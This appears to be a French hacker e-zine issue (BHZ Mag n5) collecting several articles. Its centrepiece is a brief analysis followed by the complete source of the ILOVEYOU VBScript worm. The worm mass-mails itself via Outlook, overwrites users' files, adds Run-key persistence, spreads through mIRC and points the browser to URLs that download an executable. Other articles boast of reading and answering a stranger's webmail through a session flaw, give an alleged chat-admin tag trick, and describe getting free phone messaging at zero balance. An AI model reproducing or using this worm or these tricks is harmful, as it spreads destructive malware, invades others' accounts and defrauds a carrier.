<<<--->>> On ne vous incite en aucun ca faire quoi que ce soit suite la lecture de ces articles. Consultez les dans un but informatif uniquement. Nous ne pourrions en aucun cas etre tenus responsables de vos actes suite la lecture de ce zine <<<--->>>
<<<--->>>Faites vraiment gaffe ici, c'est tres dangereux...<<<--->>>

En fait ce sont plusieurs petits articles et je les ai mis ensemble parce qu'ils etaient tous du meme auteur.


DESTROY THE DISCLAIMER


bon je suis sur qu'a force de lire tout ce qui concrne les explosifs
y en a certains qui veulent se lancer dans la fabrication des explosifs
'bombes' moins simples...il faut un peu se prparer si on ne veut pas finir
comme certains cons qui se croivent immortels et qui en ramassent
grave...en plus le matriel est pas cher et simple a trouver alors que
demander de plus...
contre les brulures aux niveaux des mains utilisez des gants ignifug donc
contre le feu cherchez a dans un brico ou autres dans le meme genre...
contre les clats le meilleur le masque de soudeur est le meilleur mais pour
trouver a...alors utilisez des lunettes de protections ils en vendent dans
les brico.
contre les gaz en tout genre prenez un masque c'est vraiment pas cher du
tout et c'est vraiment utile...
bon ben pour le matos c'est tout mais pour les explosifs en eux meme
il faut faire preuve d'un peu d'imagination pour crer des ractions en
chaine des piges etc...c'est comme a que l'ont se perfectionne(a
dpend...)bon pour le DESTROY DISCLAIMER c'est fini...


[Cette partie de l'article (qui comprend les recettes suivantes : cocktail molotov chimique, explosif sensible l'eau, detonateur, explosifs divers, mini-grenade, fumigene, lance-flammes, mini-shrapnel, fumigene tres simple) a ete supprimmee pour la version du zine distribuee sur madchat. Afin de lire la version originale de BHZ mag n5, rendez vous sur le site du BHZ : http://www.thebhz.org]



*************************
* 7.Le virus I LOVE YOU *
*************************

<<<--->>> On ne vous incite en aucun ca faire quoi que ce soit suite la lecture de ces articles. Consultez les dans un but informatif uniquement. Nous ne pourrions en aucun cas etre tenus responsables de vos actes suite la lecture de ce zine <<<--->>>


Comme vous le savez, le virus I LOVE YOU est un de ceux qui a cause le plus de degats ces derniers temps, en affectant des tas d'organisations,etc... une fois de plus c'est grace outlook qu'il se multiplie... C'est un virus (ou plutot un ver) au format VBS (Visual Basic Script) C'est un langage invente par MiKro$oft qui peut etre utilise directement depuis Windows ou inclu dans une page web. Pour creer un fichier vbs, rien de plus simple : il suffit d'un editeur de texte. Petite explication pour ce beau virus : quand on dit qu'il rend inutilisable certains fichiers, en fait il ajoute son code source au fichier alors evidemment on ne peut plus les utiliser. Il se transmet aussi par MIrc en changeant le script.ini du programme.

<--extrait du code-->
if (eq<>folderspec) then
if (s = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or _
(s = "script.ini") or (s = "mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
<--extrait du code-->

Il change l'adresse de demarrage d'Internet Explorer, quand il envoie le message via Outlook, le sujet est ILOVEYOU, le message comprend la phrase kindly check the attached LOVELETTER coming from me. Et le fichier attache est LOVE-LETTER-FOR-YOU.TXT.vbs et comme la plupart des gens n'ont pas choisi l'option "afficher les extensions MS-Dos, ils voient juste LOVE-LETTER-FOR-YOU.TXT...

<--extrait du code-->
if (regad = "") then
set male = out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
<--extrait du code-->

Il cree un fichier LOVE-LETTER-FOR-YOU.HTM qui sera place dans les repertoires sytemes de l'ordi et ce fichier Html, quand il sera lu, lancera le fichier VBS (et oui, grace MiKro$oft, le VBS peut etre lance dans une page html...)
Ca, c'etait une courte analyse de la source, la voici complete :

<--couper ici-->
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
'Comments begining with ' added by The Hidden May 4 2000
On Error Resume Next
dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow

eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll

main()


sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
'check the time out value for WSH
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
' Set script time out to infinity
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
end if
'Create three copies of the script in the windows, system32 and temp folders
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
'Set IE default page to 1 of four locations that downloads an executable.
'If the exectuable has already been downloaded set it to run at the next login and set IE's start page to be blank
regruns()
'create an html file that possibly runs an activex component and runs one of the copies of the script
html()
'Resend script to people in the WAB
spreadtoemail()
'overwrite a number of file types with the script
'if the files are not already scripts create a script file with the same name with vbs extention and
'delete the original file
'mirc client have a script added to send the html file created earlier to a channel
listadriv()
end sub



sub regruns()
On Error Resume Next
Dim num, downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread = ""
downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread = "") then
downread = "c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe") = 1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread & "\WIN-BUGSFIX.exe") = 0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", downread & "\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "about:blank"
end if
end sub

sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path & "\")
end if
Next
listadriv = s
end sub

sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
s = lcase(f1.name)
if (ext = "vbs") or (ext = "vbe") then
set ap = fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext = "js") or (ext = "jse") or (ext = "css") or _
(ext = "wsh") or (ext = "sct") or (ext = "hta") then
set ap = fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname = fso.GetBaseName(f1.path)
set cop = fso.GetFile(f1.path)
cop.copy(folderspec & "\" & bname & ".vbs")
fso.DeleteFile(f1.path)
elseif(ext = "jpg") or (ext = "jpeg") then
set ap=fso.OpenTextFile(f1.path, 2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path & ".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3 = fso.CreateTextFile(f1.path & ".vbs")
mp3.write vbscopy
mp3.close
set att = fso.GetFile(f1.path)
att.attributes = att.attributes + 2
end if
if (eq<>folderspec) then
if (s = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or _
(s = "script.ini") or (s = "mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub

sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub

sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub

function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget = regedit.RegRead(value)
end function

function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

sub spreadtoemail()
On Error Resume Next
dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad
set regedit = CreateObject("WScript.Shell")
set out = WScript.CreateObject("Outlook.Application")
set mapi = out.GetNameSpace("MAPI")
for ctrlists = 1 to mapi.AddressLists.Count
set a = mapi.AddressLists(ctrlists)
x = 1
regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)
if (regv = "") then
regv = 1
end if
if (int(a.AddressEntries.Count) > int(regv)) then
for ctrentries = 1 to a.AddressEntries.Count
malead = a.AddressEntries(x)
regad = ""
regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead)
if (regad = "") then
set male = out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD"
end if
x = x + 1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out = Nothing
Set mapi = Nothing
end sub

sub html
On Error Resume Next
dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6
dta1= "<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2= "set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1 = replace(dta1, chr(35) & chr(45) & chr(35), "'")
dt1 = replace(dt1, chr(64) & chr(45) & chr(64), """")
dt4 = replace(dt1, chr(63) & chr(45) & chr(63), "/")
dt5 = replace(dt4, chr(94) & chr(45) & chr(94), "\")
dt2 = replace(dta2, chr(35) & chr(45) & chr(35), "'")
dt2 = replace(dt2, chr(64) & chr(45) & chr(64), """")
dt3 = replace(dt2, chr(63) & chr(45) & chr(63), "/")
dt6 = replace(dt3, chr(94) & chr(45) & chr(94), "\")
set fso = CreateObject("Scripting.FileSystemObject")
set c = fso.OpenTextFile(WScript.ScriptFullName, 1)
lines = Split(c.ReadAll, vbcrlf)
l1 = ubound(lines)
for n = 0 to ubound(lines)
lines(n)=replace(lines(n), "'", chr(91) + chr(45) + chr(91))
lines(n)=replace(lines(n), """", chr(93) + chr(45) + chr(93))
lines(n)=replace(lines(n), "\", chr(37) + chr(45) + chr(37))
if (l1 = n) then
lines(n) = chr(34) + lines(n) + chr(34)
else
lines(n) = chr(34) + lines(n) + chr(34) & "&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines, vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
<--couper ici-->

Je vous rappelle ce que fait ce virus : il endommage les fichiers jpeg, mp3, mp2 (ca on s'en fout personne n'en a), se transmet via le carnet d'adresses de Outlook.


********************************
* 8.Hack de caramail version 4 *
********************************

<<<--->>> On ne vous incite en aucun ca faire quoi que ce soit suite la lecture de ces articles. Consultez les dans un but informatif uniquement. Nous ne pourrions en aucun cas etre tenus responsables de vos actes suite la lecture de ce zine <<<--->>>


Bon, ce est juste un petit truc que j'ai decouvert en allant sur caramail mais ca eput etre considere comme un hack. Avant d'expliquer ca, il faut d'abord donner quelques explications suir la methode d'authentification d'utilisateur utilisee par caramail. Ils utilsent les cookies (c'est ce qui permet de faire le hack de caramail version 1) Mais si vous allez voir les cookies de votre navigateur, vous ne verrez rien portant la mention caramail (ce serait trop simple) Et si vous voulez vous connectez sur la page de votre boite de reception sans le cookie (apres avoir ete sur la page quitter.asp) il y aura un petit message "probleme reception cookie". Et alors je me suis dit "Et si on ouvre deux comptes dans une fenetre differente du meme navigateur, qu'est ce que ca fait ?" Et bien je vais expliquer ca comme ceci : disons qu'il y a le premier compte (compte1@caramail.com) et le deuxieme compte (compte2@caramail.com) je vais sur la page d'accueil, je me connecte avec comme login compte1. Je vais voir mes messages,etc... puis j'aouvre une nouvelle fenetre du navigateur (j'ai utilise netscape) et je me connecte avec comme login compte2. je vais lire mes messages,etc... retour la premiere fenetre (compte1) et l quand je cliques sur "boite de reception" miracle j'ai la boite de reception du compte2 en etant connecte avec comme login compte1. En soi cela n'a rien d'exceptionnel etant donne que c'est base sur le principe d hack de caramail version 1 (voir BHZ Mag n1) mais c'est caramail qui nous permet de l'exploiter. Avec compte1 je vais voir les emails de compte2 et je peux y repondre avec bien entendu comme nom d'utilisateur compte1. (C'est l que ca devient interessant) cette technique permet donc d'intercepter des messages, de repondre aux messages de quelqu'un d'autre,etc.... Mais vous vous dites sans doute qu'il n'y a pas beaucoup de moyen de l'exploiter... Voici un truc qui m'est reelement arrive et c'est l que j'ai pour la premiere fois utilise cette technique en dehors de la maniere theorique expliquee ci-dessus.
C'etait l'ecole. a la mediatheque, y'a evidemment pas assez d'ordis pour tout le monde... je m'en trouve un, je vais lire mes emails puis une fille s'amene derriere moi et elle me demande si elle peut aller lire ses emails "juste 5 min." etant donne que le contenu des messages etait comprommetant, je me suis depeche de retrecir la fenetre des que j'avais entendu sa voix. Au moment meme je n'ai pas realise ce que j'allais faire puis des que j'ai vu les deux fentres dans la barre des taches je me suis dit "tiens ca peut etre interessant..." Une fois que la fille avait fini de lire et d'ecrire ses emails (c'est--dire une demi-heure plus tard et non 5 minutes...) elle ferme la fenetre et comme 90 % des utilisateurs de caramail, elle ne passe pas par le lien quitter qui est tout en bas de la frame de gauche (moi non plus je ne le fais pas...) J'attends qu'elle s'en aille et puis j'agrandis ma fenetre..... et hop j'avais acces ses emails ,aux emails qu'elle avait envoyes,etc.... et je pouvais bien entendu y repondre, en supprimer,etc... Cool, non ?
Je profite aussi de cet article pour ajouter quelque chose propos de caramail : dans l'article "hack de caramail version 3" de BHZ Mag n4, je disais que j'avais eu acces au serveur grace un plantage du CarAnnauaire (une sorte de buffer overflow) et bien ce n'est desormais plus possible : ils ont changes leur systemes et ils sont desormais sous Unix et non plus sous Windaube NT. (cfr. le bas de la page du CarAnnnauaire).
Encore un truc : c'est Grim@ qui me l'a dit celui-ci : il suffit de rajouter le tag html suivant : <PARAM name="caraadmin" value="TRUE"> dans le code html de la page contenant le dialogue en direct de caramail pour etre admin....


****************************************************
* 9.S'amuser avec les abonnements Tempo (Mobistar) *
****************************************************

<<<--->>> On ne vous incite en aucun ca faire quoi que ce soit suite la lecture de ces articles. Consultez les dans un but informatif uniquement. Nous ne pourrions en aucun cas etre tenus responsables de vos actes suite la lecture de ce zine <<<--->>>


Bon, ici on va voir toutes les belles petites choses interessantes qu'on peut faire avec simplement un GSM et un abonnement Tempo (les cartes de Mobistar). Comme vous l'avez sans doute remarque, depuis peu, avec un abonnement Tempo on peut aussi envoyer des SMS (short message system, des mini-messages) vers les copains qui ont aussi un abonnement chez Mobistar. Cool, ca coute un franc (0,25 Euros) par message et il parait qu' partir du 1er juin ce sera 5 franc. Ca ne va pas ca ! Pour une fois qu'il y a un truc marrant, il faudrait encore payer ?? Je ne suis pas d'accord... C'est encore un truc que j'ai decouvert par hasard et ca m'a semble interessant donc je me suis dit que j'allais ecrire un ptit article l-dessus. C'etait samedi. (Et oui je vais encore raconter toute mon histoire dans les details, je sais que ca ne plait pas tout le monde mais tant pis...). Donc on etait alle au bowling le soir avec des copains, pis quand je rentre chez moi, quelques minutes plus tard, dring, le telephone sonne. C'etait une fille (un peu bizarre mais sympa) qui me sonnait. Elle a quand meme parle pendant une heure (mais comme j'avais ENORMEMENT bu ce soir-l, je ne l'ecoutais qu' moitie.) Puis, quand ca s'est fini, j'ai sonne un pote qui etait venu au bowling, parce qu'il m'avait demande de lui raconter tout ce que la meuf me dirait. C'est avec lui que j'echangeais le plus de SMS. On parle, on parle et puis hop, ca s'est coupe, les connards ils m'avaient coupes ! Puis je vois dernier appel : 2247 secondes, solde restant 0,0 Bef... Et merde... enfin je me dis, c'est pas grave, je peux toujours etre appele... je vais boire un ptit coup puis je pieute. le lendemain matin, mal la tete (normal mais bon..) J'allume le GSM et l je vois 2 messages. Je fais le 5555 (normalement c gratuit) mais comme j'avais plus de thunes, je pouvais pas ecouter mes messages... Bon, tant pis... Puis, mon pote m'envoie un SMS et l sans faire attention, je lui en re-envoie un. C'est magique ! Le message a ete envoye, sans rien payer puisque de toute facon mon solde d'appel restant etait de 0 francs ! (oui je sais tout ce texte juste pour dire ca c'est un peu long mais j'aime bien de decrire une situation dans son contexte et puis sans tout ces evenements, je n'aurais ptet pas decouvert ca...) Alors pendant le reste de la journee, on s'envoie des SMS et puis je me rappelle d'un truc : quand on envoie le message EMA adresse@email corps du message , on peut envoyer un email n'importe qui partir du GSM, comme si c'etait un bete SMS. Je crois (je suis pas sur) que c'est sense couter 6 francs. Et donc j'envoie ce message et Hop ! ca marche de nouveau et sans payer quoi que ce soit... Et l je me suis dit "Hum, c'est cool, grace ca je peux envoyer des emails gratuitement, de n'importe o..." et je me suis souvenu d'un projet de Mobistar : le Mail Exchanger machin truc enfin c quelque chose qui donne chaque utilisateur une email ...@mobistar.be et on peut soit lire ses emails via le site, soit par POP, soit ils envoient un SMS sur le GSM. Ce systeme devrait bientot etre en etat de marche. Ca va etre genial parce que ca veut dire qu'on pourra GRATUITEMENT et de n'importe o lire et ecrire ses emails... et ca avec un bete GSM, meme pas besoin d'un putain de GSM super cher avec la technologie WAP...Et comme on sait envoyer des SMS, on a aussi bien sur acces gratuitement tout les ptits services un peu cons de chez Mobistar (horoscope, lotto, meteo,etc...).
Bon je sais c'est du hacking/phreaking deux balles mais au moins c'est facile faire, accessible tout plein de gens, et enfin ca permet de faire un truc qu'on pouvait pas faire avant.

***************************
* 10.S'amuser la maison *
***************************

<<<--->>> On ne vous incite en aucun ca faire quoi que ce soit suite la lecture de ces articles. Consultez les dans un but informatif uniquement. Nous ne pourrions en aucun cas etre tenus responsables de vos actes suite la lecture de ce zine <<<--->>>
<<<--->>> Faites gaffe ici c'est tres dangereux...<<<--->>>

Alors dans cet article il va y avoir plusieurs petites recettes interessantes dont le principal avantage est qu'elles sont faciles faire (ben oui parce que sinon moi je saurais pas les faire...)

[cette partie de l'article (qui comprend les sections suivantes : pieger une ampoule, detonateur fil) a ete supprimmee pour la version de BHZ mag n5 distribuee sur madchat. Afin de lire la version originale du zine, rendez vous sur le site du BHZ : http://www.thebhz.org]




**********************************************************************************************************************************************************************************************
******* ******* ******* ******* ******* ******* ******* *****
******* ******* ******* ******* ******* ******* *******
******* ******* ******* ******* ******* *******
******* ******* ******* ******* *******
******* ******* ******* *******
******* ******* *******
******* *******
*******

Et voil, dj la fin de ce zine, il est surement moins technique que BHZ Mag n0 4 mais bon... Ils sont tous differents apres tout...
Pour nous joindre :
Asmodeus :

  
asmodeus@mail.be
Deepthroat : teknocide@hotmail.com
Flat Eric : Flat_eric@moncourrier.com
Grim@ : grima@hotmail.com
Greven : j'en sais rien : il chanhge tout le temps...
Sexywax : mulphex78@hotmail.com

Pour faire partie du groupe ou juste pour ecrire un article, envoyez moi un mail : asmodeus@mail.be
Pour nous insulter : Flat_eric@moncourrier.com
Pour nous donner vos mensurations ou pour faire un strip tease gratuit : asmodeus@mail.be
Si vous aussi vous voulez apprendre piquer la meuf d'un pote : Flat_eric@moncourrier.com

Voil c'est definitivement fini pour ce zine. Visitez le site du BHZ : http://www.bhz.be.tf http://www.thebhz.org

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT